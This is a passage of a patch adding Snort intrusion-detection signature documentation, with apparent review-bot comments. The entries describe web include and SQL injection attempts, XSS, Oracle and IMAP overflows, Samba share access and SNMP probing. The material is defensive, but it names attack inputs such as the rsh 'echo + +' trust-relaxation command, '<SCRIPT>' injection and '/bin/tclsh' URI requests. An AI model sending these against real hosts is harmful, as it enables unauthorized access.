+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "approb.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
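Review bot: "+Simple. Exploits exist." under Ease of Attack together with an empty Additional References section is inconsistent; if public exploit code for the "babInstallPath" include in "approb.php" is known, the advisory or exploit reference should be cited so an analyst can confirm the payload. The third Detailed Information paragraph about validating "the credentials of a client host" and the credential wording in Attack Scenarios are the same mismatched boilerplate as in the other remote-file-include files in this patch and should be dropped. Also "exploitation attempt has been attempted" and "ona web server" need correcting.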
--- /dev/null
+++ b/doc/signatures/1827.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1827
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
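Review bot: "+Many older versions of web server software are affected, as are numerous" under Affected Systems contradicts the Detailed Information, which correctly places the defect in web applications that echo unfiltered input into HTML; the web server itself is rarely the component at fault. Suggest "Any web application that reflects user input into a page without encoding it." The Corrective Action "+properly validates input." should also mention output encoding of user-supplied data when it is written into HTML, since input validation alone does not stop reflected script. Typo in False Positives: "legimately" should be "legitimately".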
--- /dev/null
+++ b/doc/signatures/603.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 603
+
+--
+Summary: 
+This event is generated when an attempt to modify access control permissions for remote shell logins is attempted.
+
+--
+Impact: 
+An attacker may have modified remote login permissions such that any host is allowed to initiate a remote session on the target host.
+
+-- 
+Detailed Information: 
+The rule generates an event when system reconfiguration is attempted via "rsh". 
+
+The command "echo + +" is used to relax access control permissions for r-services to allow access from any site without the need for password authentication. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems use the "rsh" service to allow a connection to the machine for establishing an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with "rsh" enabled and reconfigures it to allow access from any location
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS385
+
+--
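Review bot: the file skips the Affected Systems section entirely (Detailed Information at "+Some UNIX systems use the "rsh" service ..." runs straight into "+Attack Scenarios:"), while every other file in this patch carries it; it should list hosts with the r-services (rsh/rlogin) enabled. Detailed Information also says "+The command "echo + +" is used to relax access control permissions for r-services" without naming what is written to: the "+ +" wildcard goes into the r-services trust file (.rhosts or hosts.equiv), and that is the file an analyst should check on the target. The Corrective Action "+Use ssh for remote access instead of rlogin." should say rsh as well, and add disabling the r-services outright.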
--- /dev/null
+++ b/doc/signatures/815.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+815
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
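Review bot: nothing in this file identifies what SID 815 actually matches; Summary, Detailed Information and Affected Systems ("+All systems running CGI applications") are all generic, so an analyst cannot tell which CGI script or URI triggered the event or which product to patch. Suggest naming the script and the product it ships with, and filling Additional References. Typo: "ona web server" should be "on a web server"; the line "+relationships between the victim server and other hosts can be exploited by the attacker." is not wrapped to the width used by the rest of the file.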
--- /dev/null
+++ b/doc/signatures/100000619.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000619
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_validate_edit.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_validate_edit.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
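Review bot: the Summary's closing clause "may indicate that an exploitation attempt has been attempted" is redundant; write "may indicate an exploitation attempt". In Detailed Information, "running ona web server" should be "on a web server" and "attackers choosing" should be "attacker's choosing"; the third paragraph there (credential validation of a client host) is generic boilerplate that does not describe a remote file include and can be dropped. The Sid and Affected Systems blocks lack the blank line before "--" that the other files in this patch use, and Additional References is empty; add the vendor advisory or CVE for the Indexu "admin_template_path" issue.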
--- /dev/null
+++ b/doc/signatures/1011.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1011
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
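Review bot: neither the Summary ("a potential weakness on a host running ... IIS") nor Detailed Information says which URI or file the rule matches, so an analyst cannot tell what request triggered sid 1011; name the request the rule looks for. Impact reads "Information gathering possible administrator access." and needs punctuation ("Information gathering; possible administrator access."). "Sid: 1011" is on one line whereas the other files put the number on its own line, and Additional References is empty.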
--- /dev/null
+++ b/doc/signatures/1206.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1206
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
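Review bot: the Summary ("a known vulnerability in a CGI web application running on a server") and the whole Detailed Information section are generic and never identify the script or application sid 1206 matches; the same text appears verbatim in 1459.txt and 1706.txt in this patch. Name the script in Summary and in Affected Systems. Also fix "running ona web server" (on a) and "attackers choosing" (attacker's), and rewrap "relationships between the victim server and other hosts can be exploited by the attacker." to the line width used by the rest of the file.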
--- /dev/null
+++ b/doc/signatures/100000808.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000808
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "AjaxPortal" application running on a webserver. Access to the file "ajaxp.php" with SQL commands being passed as the "username" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "username" parameter in the "ajaxp.php" script used by the "AjaxPortal" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using AjaxPortal
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
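Review bot: the file opens with two blank lines before "Rule:" and the Sid and Affected Systems blocks lack the blank line before "--"; match the layout of the other files. "may indicate that an exploitation attempt has been attempted" is redundant, and "running ona web server" and "attackers choosing" need fixing. The third Detailed Information paragraph (credential validation of a client host) does not apply to SQL injection via the "username" parameter; the first two paragraphs already describe the issue. The securitydocs.com reference is a general SQL injection article; a vendor advisory or CVE for the AjaxPortal "ajaxp.php" issue would be more useful to an analyst.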
--- /dev/null
+++ b/doc/signatures/1459.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1459
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
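Review bot: this file is identical to 1206.txt apart from the sid, so it still does not say which CGI script or application sid 1459 matches; Summary and Affected Systems should name it. The same typos apply: "running ona web server" (on a), "attackers choosing" (attacker's), and the over-long "relationships between the victim server and other hosts ..." line should be rewrapped.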
--- /dev/null
+++ b/doc/signatures/893.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+893
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the CGI web application webdist.cgi running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited
+by the attacker.
+
+In particular this event is generated when an attempt is made to access
+"MachineInfo" using the CGI application webdist.cgi, distributed with
+IRIX operating systems using the package IRIX Mindshare OutBox.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	IRIX 5.x
+	IRIX 6.x
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1997-12.html
+
+--
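Review bot: the first Detailed Information paragraph (credential validation of a client host) is boilerplate that does not describe the webdist.cgi issue; the second paragraph, naming "MachineInfo", webdist.cgi and IRIX Mindshare OutBox, is the useful content and should lead the section. Fix "running ona web server" and "attackers choosing". The CERT reference (CA-1997-12) is the kind of pointer the other files in this patch are missing.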
--- /dev/null
+++ b/doc/signatures/2642.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2642
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_site_instantiate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck629.html
+
+--
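Review bot: Ease of Attack says "Simple." while Attack Scenarios states the attack "requires an attacker to logon to the database with a valid username and password combination"; qualify Ease of Attack to say database credentials are required. The "$ORACLE_PORTS" sentence in Detailed Information is a sensor configuration instruction, not a description of the vulnerability, and belongs in Corrective Action or a separate configuration note. Also "a Oracle" in Summary should be "an Oracle", and the package containing the "drop_site_instantiate" procedure is not named while the "refresh_template_name" parameter is; give the fully qualified procedure name.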
--- /dev/null
+++ b/doc/signatures/3132.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3132
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+the GD Graphics Library.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that software that handles PNG files,
+libpng, allocates memory for PNG images. A maliciously formatted PNG
+image sent to a vulnerable server may cause a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.  A
+PNG file with an excessively large image height, width, or depth, or
+combination of these can cause a buffer overflow.
+
+--
+Affected Systems:
+	GD Graphics Library 2.0.28 and earlier
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file and upload it to a web server,
+possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
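Review bot: Summary and Affected Systems attribute the overflow to the GD Graphics Library (2.0.28 and earlier), but Detailed Information attributes it to "software that handles PNG files, libpng"; the two must agree on which library's PNG memory allocation is at fault, since the Affected Systems entry only lists GD. Additional References is empty; add the vendor advisory or CVE for this issue.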
--- /dev/null
+++ b/doc/signatures/2467.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2467
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
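Review bot: "adminsitrative shares" in Attack Scenarios should be "administrative shares". Detailed Information does not say which share name or request the rule matches, so an analyst cannot distinguish sid 2467 from the other Samba share rules documented in this patch with the same text; state the share this rule looks for.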
--- /dev/null
+++ b/doc/signatures/2796.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2796
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_mview_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
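Review bot: the lines "vulnerability in the procedure register_mview_repgroup" / ". This procedure is included in" / "dbms_repcat." are broken mid-sentence with the period on its own line; rejoin them as one sentence. "Oracle Oracle9i" in Affected Systems duplicates the vendor name. Several separator lines ("-- ") carry trailing whitespace, "None Known" and "Apply the appropriate vendor supplied patch" lack terminal periods, and Additional References is empty.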
--- /dev/null
+++ b/doc/signatures/1351.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1351
+
+--
+Summary:
+Attempted tclsh command access via web
+
+--
+Impact:
+Attempt to excute a tclsh command on a webserver
+
+--
+Detailed Information:
+This is an attempt to execute a tclsh command or script on a webserver. tclsh is a shell application that reads tcl commands and evaluates them. The attacker could possibly execute a command or script on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/tclsh'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1352
+
+--
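Review bot: this file has no Affected Systems section, which every other file in this patch carries; add one. Fix "excute" (execute) in Impact, the missing space in "'/bin/tclsh'in the URI", and "it's designated web root" (its). The Additional References entry "sid: 1352" is a cross-reference to another rule rather than an external reference; if kept, label it as a related sid. The blank line after "Corrective Action:" and the missing blank line before the following "--" break the layout convention of the other files.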
--- /dev/null
+++ b/doc/signatures/1418.txt
@@ -0,0 +1,77 @@
+Rule:
+  
+--
+Sid:
+1418
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over TCP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 161, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to tcp port 161, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
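Review bot: Detailed Information states the SNMP Trap daemon "usually listens on port 161" and Attack Scenarios repeats "tcp port 161", but 161 is the SNMP agent port; traps go to port 162. Either the port or the "SNMP-Trap" wording in the Summary is wrong, so check the rule's destination port and make the doc match it. Also "sucessful" should be "successful", and the line after "Rule:" contains only whitespace.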
--- /dev/null
+++ b/doc/signatures/3070.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3070
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"fetch" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
